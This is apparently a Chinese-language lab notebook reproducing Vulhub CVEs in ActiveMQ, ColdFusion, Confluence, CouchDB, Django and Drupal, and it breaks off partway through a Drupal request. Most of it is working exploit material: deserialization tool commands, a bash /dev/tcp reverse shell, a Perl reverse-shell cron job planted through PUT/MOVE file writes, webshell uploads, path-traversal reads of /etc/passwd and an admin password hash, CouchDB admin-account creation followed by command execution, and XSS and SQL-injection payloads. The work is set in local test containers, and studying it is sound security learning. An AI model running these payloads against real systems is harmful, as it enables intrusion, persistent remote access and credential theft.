![image-20211029193440428](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029193440428.png)

## ActiveMQ 反序列化漏洞（CVE-2015-5254）

打开后是这样的：

![image-20211029204000739](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029204000739.png)

我们在GitHub上下载了用于这个漏洞的工具：

https://github.com/matthiaskaiser/jmet

![image-20211029204212128](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029204212128.png)

下载完成后，用kali执行命令：

```
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
```

得到如下信息：

```
2021-10-29 08:51:27,771 main INFO sun.reflect.Reflection.getCallerClass is not supported. ReflectionUtil.getCallerClass will be much slower due to this. java.lang.ClassNotFoundException: sun.reflect.Reflection
      at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581)
      at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
      at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
      at java.base/java.lang.Class.forName0(Native Method)
      at java.base/java.lang.Class.forName(Class.java:315)
      at org.apache.logging.log4j.util.LoaderUtil.loadClass(LoaderUtil.java:122)
      at org.apache.logging.log4j.util.ReflectionUtil.<clinit>(ReflectionUtil.java:65)
      at org.apache.logging.log4j.core.selector.ClassLoaderContextSelector.getContext(ClassLoaderContextSelector.java:72)
      at org.apache.logging.log4j.core.impl.Log4jContextFactory.getContext(Log4jContextFactory.java:227)
      at org.apache.logging.log4j.core.impl.Log4jContextFactory.getContext(Log4jContextFactory.java:45)
      at org.apache.logging.log4j.LogManager.getContext(LogManager.java:174)
      at org.apache.logging.log4j.LogManager.getLogger(LogManager.java:618)
      at de.codewhite.jmet.target.JMSTarget.<init>(JMSTarget.java:24)
      at de.codewhite.jmet.target.impl.ActiveMQTarget.<init>(ActiveMQTarget.java:16)
      at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
      at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
      at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
      at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:490)
      at java.base/java.lang.Class.newInstance(Class.java:584)
      at de.codewhite.jmet.JMET.validateAndCreateTargets(JMET.java:196)
      at de.codewhite.jmet.JMET.setup(JMET.java:116)
      at de.codewhite.jmet.JMET.main(JMET.java:58)

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by ysoserial.payloads.util.Reflections (file:/home/kali/Desktop/tool/jmet-0.1.0-all.jar) to field com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl._bytecodes
WARNING: Please consider reporting this to the maintainers of ysoserial.payloads.util.Reflections
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
ERROR d.c.j.JMET [main] Failed to setup external libraries!
java.lang.ClassCastException: class jdk.internal.loader.ClassLoaders$AppClassLoader cannot be cast to class java.net.URLClassLoader (jdk.internal.loader.ClassLoaders$AppClassLoader and java.net.URLClassLoader are in module java.base of loader 'bootstrap')
      at de.codewhite.jmet.JMET.setupExternalLibs(JMET.java:167) [jmet-0.1.0-all.jar:?]
      at de.codewhite.jmet.JMET.setup(JMET.java:118) [jmet-0.1.0-all.jar:?]
      at de.codewhite.jmet.JMET.main(JMET.java:58) [jmet-0.1.0-all.jar:?]
INFO d.c.j.t.JMSTarget [main] Connected with ID: ID:kali-45299-1635511887894-0:1
INFO d.c.j.t.JMSTarget [main] Sent gadget "ROME" with command: "touch /tmp/success"
INFO d.c.j.t.JMSTarget [main] Shutting down connection ID:kali-45299-1635511887894-0:1

```

![image-20211029205343403](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029205343403.png)

我本来还以为这是报错的意思，结果我接着去做，发现没错。

在URL后面加上：

> /admin/browse.jsp?JMSDestination=event

（不知道为啥弹出来一个窗口让输入账号密码，我用admin/admin尝试，发现就进去了）

进入到了如下页面：![image-20211029205841735](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029205841735.png)

发现信息的时间是对得上的

看官方的解释是，这是一个队列信息

点击一个队列信息后，进入到了如下页面：

![image-20211029210201038](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029210201038.png)

此时进入容器：

```
docker-compose exec activemq bash
```

![image-20211029210646163](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029210646163.png)

输入命令：

```
ls /tmp/
```

![image-20211029210732578](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029210732578.png)

将命令替换成弹shell语句再利用：

```
bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8087 0>&1
```

然后就发现可以命令执行了：

![image-20211029211439908](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029211439908.png)

输入exit即可退出docker容器

## ActiveMQ任意文件写入漏洞（CVE-2016-3088）

文件写入有几种利用方法：

> 写入 webshell
> 写入 cron 或 ssh key 等文件
> 写入 jar 或 jetty.xml 等库和配置文件

写入 webshell 的好处是，门槛低更方便，但前面也说了 fileserver 不解析 jsp，admin 和 api 两个应用都需要登录才能访问，所以有点鸡肋；写入 cron 或 ssh key，好处是直接反弹拿 shell，也比较方便，缺点是需要 root 权限；写入 jar，稍微麻烦点（需要 jar 的后门），写入 xml 配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道 activemq 的绝对路径。

---

进入后和上面的页面信息一样：
![image-20211029212328226](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029212328226.png)

### 直接写入webshell

在URL后面输入：

```
/admin/test/systemProperties.jsp
```

查看 ActiveMQ 的绝对路径：

![image-20211029212517195](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029212517195.png)

然后可以用put方法上传文件，用burpsuite抓包后，将数据包中内容替换成如下内容：

```
PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

webshell...

```

然后再将webshell移动到 web 目录下的 api 文件夹（`/opt/activemq/webapps/api/s.jsp`）中：

修改数据包中的内容为如下信息：

```
MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: 127.0.0.1:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

```

然后可以访问webshell：IP地址:8161/api/s.jsp

可以看到页面信息如下（访问源代码）：

```
webshell...

```

![image-20211029213134994](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211029213134994.png)

### 写入 crontab，自动化弹 shell

这是一个比较稳健的方法。首先上传 cron 配置文件（注意，换行一定要 `\n`，不能是 `\r\n`，否则 crontab 执行会失败）：

抓包后，将数据包中的内容修改如下：

```
PUT /fileserver/1.txt HTTP/1.1
Host: 127.0.0.1:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

```

将其移动到 `/etc/cron.d/root`：

将数据包中的内容修改如下：

```
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

```

反弹 shell：

[![ActiveMQ任意文件写入漏洞（CVE-2016-3088）](

!large)](

!large)

这个方法需要 ActiveMQ 是 root 运行，否则也不能写入 cron 文件。

### 写入 jetty.xml 或 jar

理论上我们可以覆盖 jetty.xml，将 admin 和 api 的登录限制去掉，然后再写入 webshell。

有的情况下，jetty.xml 和 jar 的所有人是 web 容器的用户，所以相比起来，写入 crontab 成功率更高一点。

尚未测试。

sandalwood · 发表于 2021-10-30 21:40:51

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）

打开后是这样的（应该就只是目录）：

![image-20211030092020386](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030092020386.png)

直接访问 http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en，即可读取文件 /etc/passwd：

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
```

![image-20211030092138477](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030092138477.png)

读取后台管理员密码 http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en：

```
rdspassword=
password=D033E22AE348AEB5660FC2140AEC35850C4DA997
encrypted=true" class="buttn-fix">
```

![image-20211030092321404](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030092321404.png)

## Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）

打开发现是这样的：

```
<div id="header"></div>
<div id="spot">
      <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANAAA
      ****
      AAAABJRU5ErkJggg=="/>
      <div id="title">404</div>
</div>
<div id="content">
<div id="error">
The page you are trying to access can not be displayed. Please try again or notify the administrator.
</div>
</div>
```

![image-20211030093335576](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030093335576.png)

随后我们访问网址：http://127.0.0.1:8500/CFIDE/administrator/index.cfm

![image-20211030093724476](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030093724476.png)

并输入密码vulhub，进入到如下界面：

![image-20211030094128611](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030094128611.png)

这样好像是代表着成功安装 Adobe ColdFusion。

我们使用参考链接中的 ColdFusionPwn （https://github.com/codewhitesec/ColdFusionPwn）工具来生成 POC：

```
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
```

POC 生成于 poc.ser 文件中，将 POC 作为数据包 body 发送给 http://your-ip:8500/flex2gateway/amf，Content-Type 为 application/x-amf：

```
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

```

进入容器中，发现 /tmp/success 已成功创建：

将 POC 改成反弹命令，成功拿到 shell

## Atlassian Confluence 路径穿越与命令执行漏洞（CVE-2019-3396）

打开后是这样的（访问IP地址：8090）：

![image-20211030101005010](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030101005010.png)

选择 “Trial installation”，之后会要求填写 license key。点击 “Get an evaluation license”，去 Atlassian 官方申请一个 Confluence Server 的测试证书（不要选择 Data Center 和 Addons）：

![image-20211030101115454](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030101115454.png)

然后点击 Next 安装即可。这一步小内存 VPS 可能安装失败或时间较长（建议使用 4G 内存以上的机器进行安装与测试），请耐心等待。

![image-20211030102910407](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030102910407.png)

如果提示填写 cluster node，路径填写 /home/confluence 即可：

![image-20211030102955181](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030102955181.png)

后续可能要求你填写数据库账号密码，选择 postgres 数据库，地址为 db，账号密码均为 postgres：

![image-20211030103538160](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030103538160.png)

发送如下数据包，即可读取文件 web.xml：

```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
```

![img](

!large)

6.12 以前的 Confluence 没有限制文件读取的协议和路径，我们可以使用 file:///etc/passwd 来读取文件，也可以通过 https://... 来加载远程文件。

该文件是一个 Velocity 模板，我们可以通过模板注入（SSTI）来执行任意命令：

![img](

!large)

## Couchdb 垂直权限绕过漏洞（CVE-2017-12635）

访问地址：IP地址：5984后，进入到如下页面：

```
{"couchdb":"Welcome","version":"2.1.0","features":["scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
```

![image-20211030111553764](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030111553764.png)

抓包后，将数据包修改为如下内容：

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 127.0.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

```

![image-20211030112210226](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112210226.png)

发送到repeater模块后，点击send，得到如下response：

```
HTTP/1.1 403 Forbidden
X-CouchDB-Body-Time: 0
X-Couch-Request-ID: 6d36cb3727
Server: CouchDB/2.1.0 (Erlang OTP/17)
Date: Sat, 30 Oct 2021 03:23:47 GMT
Content-Type: application/json
Content-Length: 59
Connection: close
Cache-Control: must-revalidate

{"error":"forbidden","reason":"Only _admin may set roles"}

```

发现是403，并且，根据提示：只有admin用户才可以创建用户，于是我们修改数据包如下：

发送包含两个 roles 的数据包，即可绕过限制：

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 127.0.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

```

在response中返回如下信息：

```
HTTP/1.1 201 Created
X-CouchDB-Body-Time: 0
X-Couch-Request-ID: 158909b2de
Server: CouchDB/2.1.0 (Erlang OTP/17)
Location: http://127.0.0.1:5984/_users/org.couchdb.user:vulhub
ETag: "1-30586bebc2032fee0301d4a8f5fbcf1d"
Date: Sat, 30 Oct 2021 03:25:57 GMT
Content-Type: application/json
Content-Length: 86
Connection: close
Cache-Control: must-revalidate

{"ok":true,"id":"org.couchdb.user:vulhub","rev":"1-30586bebc2032fee0301d4a8f5fbcf1d"}

```

成功创建管理员，账户密码均为 `vulhub`：

![image-20211030112642296](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112642296.png)

再次访问 `http://127.0.0.1:5984/_utils/`，输入账户密码 `vulhub`，可以成功登录：

![image-20211030112831069](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112831069.png)

（感觉有点像是Ubuntu的样子）

登录之后：

![image-20211030112856977](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030112856977.png)

## Couchdb 任意命令执行漏洞（CVE-2017-12636）

打开是这样的：

```
{"couchdb":"Welcome","uuid":"c5828d04ac9d9f1b1da494b337b01e52","version":"1.6.0","vendor":{"version":"1.6.0","name":"The Apache Software Foundation"}}
```

![image-20211030151106643](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030151106643.png)

然后根据上面复现的CVE-2017-12635，抓包后，将数据吧修改为如下内容（添加管理员用户）：

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 127.0.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

```

然后在命令行中依次执行如下命令：

```
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

```

![image-20211030152719664](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030152719664.png)

```
┌──(root????kali)-[/home/…/Desktop/vulhub/couchdb/CVE-2017-12636]
└─# curl -X PUT 'http://vulhub:vulhub@127.0.0.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
{"ok":true,"id":"vul","rev":"1-967a00dff5e02add41819138abb3284d"}

┌──(root????kali)-[/home/…/Desktop/vulhub/couchdb/CVE-2017-12636]
└─# curl -X POST 'http://vulhub:vulhub@127.0.0.1:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
{"error":"EXIT","reason":"{{badmatch,{error,{bad_return_value,{os_process_error,{exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n                      [{file,\"couch_query_servers.erl\"},{line,477}]},\n  {couch_query_servers,lang_proc,3,\n                      [{file,\"couch_query_servers.erl\"},{line,462}]},\n  {couch_query_servers,handle_call,3,\n                      [{file,\"couch_query_servers.erl\"},{line,334}]},\n  {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,580}]},\n  {proc_lib,init_p_do_apply,3,[{file,\"proc_lib.erl\"},{line,237}]}]}"}

┌──(root????kali)-[/home/…/Desktop/vulhub/couchdb/CVE-2017-12636]
└─# docker exec -it 8120b3a96a88 bash
root@8120b3a96a88:/var/lib/couchdb# ls
root@8120b3a96a88:/var/lib/couchdb# ls /tmp
success
root@8120b3a96a88:/var/lib/couchdb#

```

复现完毕。

## Django debug page XSS漏洞（CVE-2017-12794）

访问IP地址：8000后得到如下地址：

```
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }

  <div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
   <tr>
      <th>Request Method:</th>
      <td>GET</td>
   </tr>
   <tr>
      <th>Request URL:</th>
      <td>http://127.0.0.1:8000/</td>

  <div id="info">

   <p>
   Using the URLconf defined in <code>__main__</code>,
   Django tried these URL patterns, in this order:
   </p>


      <li>
            ^create_user/$
      </li>

   <p>
      The empty path didn't match any of these.
   </p>

<p>
   You're seeing this error because you have <code>DEBUG = True</code> in
   your Django settings file. Change that to <code>False</code>, and Django
   will display a standard 404 page.
</p>
```

![image-20211030154957632](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030154957632.png)

然后在URL后面添加

```
/create_user/?username=<script>alert(1)</script>
```

访问后，在页面中得到如下信息：

```
Hello, user has been created!
```

![image-20211030155540029](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030155540029.png)

然后再次访问：

```
/create_user/?username=<script>alert(1)</script>
```

触发弹窗：

![image-20211030155701235](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030155701235.png)

可见，Postgres 抛出的异常为

```
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.
```

这个异常被拼接进

```
The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception
```

最后触发 XSS。

## Django < 2.0.8 任意URL跳转漏洞（CVE-2018-14574）

访问IP地址：8000，得到如下页面：

```
Hello, world.
```

![image-20211030161108283](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030161108283.png)

访问地址：127.0.0.1:8000//www.example.com

转到如下界面，可见已完成跳转：

```
<head>
<title>Example Domain</title>

<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
body {
      background-color: #f0f0f2;
      margin: 0;
      padding: 0;
      font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;

}
div {
      width: 600px;
      margin: 5em auto;
      padding: 2em;
      background-color: #fdfdff;
      border-radius: 0.5em;
      box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
      color: #38488f;
      text-decoration: none;
}
@media (max-width: 700px) {
      div {
         margin: 0 auto;
         width: auto;
      }
}
</style>
</head>

<body>
<div>
<h1>Example Domain</h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
```

![image-20211030161601095](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030161601095.png)

## Django JSONField/HStoreField SQL注入漏洞（CVE-2019-14234）

访问IP地址：8000，得到如下页面：

![image-20211030162708407](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030162708407.png)

然后登陆后台 ip地址:8000/admin/，用户名密码为 admin、a123123123

![image-20211030162901818](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030162901818.png)

![image-20211030162925790](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030162925790.png)

登陆后台后，进入模型 Collection 的管理页面IP地址:8000/admin/vuln/collection/：

![image-20211030163036446](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030163036446.png)

然后在 GET 参数中构造 detail__a'b=123 提交，其中 detail 是模型 Collection 中的 JSONField：

**IP地址:8000/admin/vuln/collection/?detail__a%27b=123**

得到如下的报错信息：

```
ProgrammingError at /admin/vuln/collection/

syntax error at or near "b') = '"
LINE 1: ...llection" WHERE ("vuln_collection"."detail" -> 'a'b') = '"12...
                                                         ^

Request Method: GET
Request URL: http://127.0.0.1:8000/admin/vuln/collection/?detail__a%27b=123
Django Version: 2.2.3
Exception Type: ProgrammingError
Exception Value:

syntax error at or near "b') = '"
LINE 1: ...llection" WHERE ("vuln_collection"."detail" -> 'a'b') = '"12...
                                                         ^

Exception Location: /usr/local/lib/python3.6/site-packages/django/db/backends/utils.py in _execute, line 84
Python Executable: /usr/local/bin/python
Python Version: 3.6.9
Python Path:

['/usr/src',
'/usr/local/lib/python36.zip',
'/usr/local/lib/python3.6',
'/usr/local/lib/python3.6/lib-dynload',
'/usr/local/lib/python3.6/site-packages']

Server time: Sat, 30 Oct 2021 08:31:49 +0000
```

![image-20211030163240710](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030163240710.png)

## Django GIS SQL注入漏洞（CVE-2020-9402）

访问IP地址：8000，得到如下界面：

漏洞一

首先访问 http://your-ip:8000/vuln/。

在该网页中使用 get 方法构造 q 的参数，构造 SQL 注入的字符串 **20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null OR (1+1**

**http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1**

可见，括号已注入成功，SQL 语句查询报错：

![img](

!large)

漏洞二

访问 http://your-ip:8000/vuln2/。在该网页中使用 get 方法构造 q 的参数，构造出 SQL 注入的字符串 **0.05))) FROM "VULN_COLLECTION2" where (select utl_inaddr.get_host_name((SELECT user FROM DUAL)) from dual) is not null --**

**http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--**

![img](

!large)

## Drupal < 7.32 “Drupalgeddon” SQL注入漏洞（CVE-2014-3704）

打开后是这样的：

```
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
  <head>
<title>Select an installation profile | Drupal</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="http://127.0.0.1:8080/misc/favicon.ico" type="image/vnd.microsoft.icon" />
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
<meta name="robots" content="noindex, nofollow" />
<style type="text/css" media="all">@import url("http://127.0.0.1:8080/modules/system/system.base.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.admin.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.menus.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.messages.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.theme.css?0");
@import url("http://127.0.0.1:8080/modules/system/system.maintenance.css?0");</style>
<style type="text/css" media="screen">@import url("http://127.0.0.1:8080/themes/seven/reset.css?0");
@import url("http://127.0.0.1:8080/themes/seven/style.css?0");</style>






<script type="text/javascript" src="http://127.0.0.1:8080/misc/jquery.js?v=1.4.4"></script>
<script type="text/javascript" src="http://127.0.0.1:8080/misc/jquery.once.js?v=1.2"></script>
<script type="text/javascript" src="http://127.0.0.1:8080/misc/drupal.js?0"></script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
  </head>
  <body class="maintenance-page in-maintenance db-offline one-sidebar sidebar-first">


  <div id="branding">
<h1 class="page-title">Select an installation profile</h1>  </div>

  <div id="page">

      <div id="sidebar-first" class="sidebar">
               <img id="logo" src="http://127.0.0.1:8080/themes/seven/logo.png" alt="Drupal" />
            <h2 class="element-invisible">Installation tasks</h2><ol class="task-list"><li class="active">Choose profile<span class="element-invisible">(active)</span></li><li>Choose language</li><li>Verify requirements</li><li>Set up database</li><li>Install profile</li><li>Configure site</li><li>Finished</li></ol>    </div>

<div id="content" class="clearfix">
               <form action="/install.php" method="post" id="install-select-profile-form" accept-charset="UTF-8"><div><div class="form-item form-type-radio form-item-profile">
<input type="radio" id="edit-profile--2" name="profile" value="standard" checked="checked" class="form-radio" />  <label class="option" for="edit-profile--2">Standard </label>

<div class="description">Install with commonly used features pre-configured.</div>
</div>
<div class="form-item form-type-radio form-item-profile">
<input type="radio" id="edit-profile--3" name="profile" value="minimal" class="form-radio" />  <label class="option" for="edit-profile--3">Minimal </label>

<div class="description">Start with only a few modules enabled.</div>
</div>
<input type="hidden" name="form_build_id" value="form-v-NcW4JwzmXoW7EqzmTvKHcg8-PO4b9-DqSF8B6HHgE" />
<input type="hidden" name="form_id" value="install_select_profile_form" />
<div class="form-actions form-wrapper" id="edit-actions"><input type="submit" id="edit-submit" name="op" value="Save and continue" class="form-submit" /></div></div></form> </div>
```

![image-20211030202215466](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030202215466.png)

使用默认的安装方式，然后信息填写如下：

![image-20211030202431921](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030202431921.png)

完成环境配置后，大概是这样的（但是可能是我填写的信息有什么问题）：

![image-20211030202754928](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030202754928.png)

用burpsuite抓包，修改数据包为如下内容：

```
POST /?q=node&destination=node HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
